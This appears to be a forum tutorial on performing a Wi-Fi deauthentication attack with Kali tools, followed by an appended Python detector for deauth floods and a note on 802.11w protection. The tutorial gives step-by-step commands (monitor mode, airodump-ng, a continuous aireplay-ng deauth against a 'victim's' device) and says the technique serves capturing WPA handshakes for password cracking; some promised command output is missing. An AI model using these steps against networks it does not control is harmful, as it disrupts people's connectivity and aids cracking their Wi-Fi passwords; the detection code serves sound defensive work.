[kali] How to perform a deauth attack (disconnect devices from any AP!)

Black Stone

This is my first tutorial so enjoy!

What you'll need!

  • A computer/laptop with a wireless card supporting packet injection.
  • A wireless AP/router.
  • A phone or any device you can connect to the AP.
!!!WARNING!!! If your wireless card doesn't support packet injection you CANNOT perform deauth attacks. !!!WARNING!!!
To test and see if your wireless card supports packet injection, do this!

In terminal type "ifconfig"; something like this should appear:

Don't worry about 'eth0' or 'lo', we're focused on wlan0 for now.
Now that we have the name of the wireless interface, let's turn on monitor mode!
To do this, type this into terminal:


To confirm that your wireless card is in monitor mode, run iwconfig; your interface name should now be "wlan0mon".
Now let's test your wireless card to see if it supports packet injection!
In terminal type
aireplay-ng --test wlan0mon
If something like this appears
12:47:05 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE) on channel 7
12:47:05 Trying broadcast probe requests...

12:47:06 Injection is working!

12:47:07 Found 1 AP
It works!!
If this appears
21:47:18 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE) on channel 6

21:47:18 Trying broadcast probe requests...

21:47:20 No Answer...

21:47:20 Found 1 AP
Then it doesn't work :(
Now that we know we can deauth, let's do it!
Since your card is already in monitor mode, just type
airodump-ng wlan0mon
A bunch of stuff will show up (which is good). If you want to know what most of it means, read below; if not, just continue!
Some of you may be wondering what a station is, and why some of them have probes and also have (not associated) next to them.
The reason is that such a station is simply not connected to an AP; if the probe has a name in it, then it's actively trying to find that AP.
You'll need to copy the AP's MAC address (the BSSID) and the MAC address of your victim's device connected to that AP.
Once you have these, fill out this command and successfully deauth someone's device.
aireplay-ng -0 0 -a (BSSID MAC) -c (Device MAC) wlan0mon(your interface name)
e.g. aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon
Command meanings!
Code:
-0 is to deauth
0 is the number of deauth packets you'll send, but 0 means you're going to send them continuously.
-a 50:C7:BF:DC:4C:E8 is the MAC address of the AP
-c E0:B5:2D:EA:18:A7 is the MAC address of the device
wlan0mon is the interface name
It should've worked! You'll disconnect that device and it'll reconnect. Generally this is used to crack WPA/WPA2: you capture the four-way handshake and use the handshake to crack it, although you'd still have to use a brute-force attack to 'guess' the pass.
Anyway, good job! You just successfully deauth'd a device!
ICQ 44488
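From the defender's side, the continuous deauthentication frames that "-0 0" sends show up in a monitor-mode capture as a burst of management frames of subtype 12 aimed at one client. The Python below is an added example, not part of the original post: it parses raw 802.11 headers (assumed to be captured without a radiotap header) and flags such bursts. The sample frames, MAC addresses, threshold and window are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 0x0C  # management frame (type 0), subtype 12

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26:  # 24-byte management header + 2-byte reason code
        return None
    version, ftype, subtype = frame[0] & 0x3, (frame[0] >> 2) & 0x3, frame[0] >> 4
    if (version, ftype, subtype) != (0, 0, DEAUTH_SUBTYPE):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_floods(captures, threshold=10, window=1.0):
    """captures: (timestamp, raw_frame) pairs in time order.
    Returns one (first_seen, bssid, dst, count) alert per flooded pair."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, frame in captures:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, _src, bssid, _reason = parsed
        seen = recent[(bssid, dst)]
        seen.append(ts)
        while ts - seen[0] > window:  # drop timestamps outside the window
            seen.popleft()
        if len(seen) >= threshold and (bssid, dst) not in alerted:
            alerted.add((bssid, dst))
            alerts.append((seen[0], bssid, dst, len(seen)))
    return alerts

# Constructed sample frames (locally administered MACs, not from a real capture).
AP, STA_A, STA_B = "020000000001", "020000000002", "020000000003"
def sample(fc, dst, reason):
    return bytes.fromhex(fc + "0000" + dst + AP + AP + "0000" + reason)

def sample_capture():
    burst = [(i * 0.02, sample("c000", STA_A, "0700")) for i in range(30)]
    beacon = [(0.05, sample("8000", "ffffffffffff", "0000"))]
    single = [(5.0, sample("c000", STA_B, "0300"))]  # one ordinary deauth
    return sorted(burst + beacon + single, key=lambda c: c[0])

if __name__ == "__main__":
    for alert in detect_floods(sample_capture()):
        print("deauth flood: first_seen=%.2f bssid=%s dst=%s count=%d" % alert)
```

Enabling 802.11w (Protected Management Frames) on the AP and its clients makes them discard spoofed deauthentication frames, so this kind of alert then indicates an attempt rather than a successful disconnect.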